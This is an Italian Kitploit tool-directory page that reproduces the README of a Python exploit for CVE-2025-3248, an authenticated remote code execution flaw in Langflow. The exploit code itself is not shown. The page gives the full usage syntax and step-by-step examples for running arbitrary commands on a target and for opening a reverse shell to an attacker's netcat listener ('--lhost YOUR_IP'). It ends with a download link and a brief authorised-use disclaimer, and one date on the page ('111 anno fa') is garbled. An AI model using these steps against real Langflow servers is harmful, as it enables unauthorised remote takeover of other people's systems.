Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE-CVE-2025-3248 — Questo script Python sfrutta la CVE-2025-3248 per eseguire comandi arbitrari o generare una reverse shell su un sistema vulnerabile. Per utilizzare questo exploit è richiesta l'autenticazione. | Kitploit
Strumenti/GitHubGitHub/tiemio/rce-cve-2025-3248
ExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

Questo script Python sfrutta la CVE-2025-3248 per eseguire comandi arbitrari o generare una reverse shell su un sistema vulnerabile. Per utilizzare questo exploit è richiesta l'autenticazione.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Esecuzione di codice remoto autenticata CVE-2025-3248 Langflow

Questo script Python sfrutta CVE-2025-3248 per eseguire comandi arbitrari o avviare una reverse shell su un sistema vulnerabile. L'autenticazione è richiesta per utilizzare questo exploit.


Caratteristiche

  • Esecuzione di comandi autenticata: Esegui comandi di sistema arbitrari sul target.
  • Reverse Shell: Avvia una reverse shell verso il tuo listener.
  • Supporto proxy: Instrada le richieste attraverso un proxy (es. Burp Suite).

Requisiti

  • Python 3.x
  • Libreria requests

Installa le dipendenze con:

root@kitploit:~
pip install requests

Utilizzo

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Argomenti

ArgomentoDescrizioneObbligatorio
-u, --urlURL di base del target (es. https://target.com)Sì
-l, --loginNome utente adminSì
-p, --passwordPassword adminSì
-c, --commandComando da eseguire sul targetNo*
--proxyURL del proxy (es. http://127.0.0.1:8080)No
--lhostHost locale per la reverse shellNo*
--lportPorta locale per la reverse shellNo*

* Devi specificare o un comando (-c) o entrambi --lhost e --lport per una reverse shell.


Esempi

1. Eseguire un comando

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Ottenere una reverse shell

Avvia un listener sulla tua macchina:

root@kitploit:~
nc -lvnp 4444

Quindi esegui:

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Usare un proxy

root@kitploit:~
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Immagine Docker

Distribuire l'immagine

Puoi distribuire l'immagine Docker usando il seguente comando:

root@kitploit:~
podman compose up -d

L'immagine sarà disponibile all'indirizzo http://localhost:7860. Crediti per il file compose: Questo repository


Dichiarazione di non responsabilità

Questo script è solo per scopi educativi e di test di penetrazione autorizzati. Non usarlo contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita a testare.


Questa readme è generata da IA.

Scarica lo strumento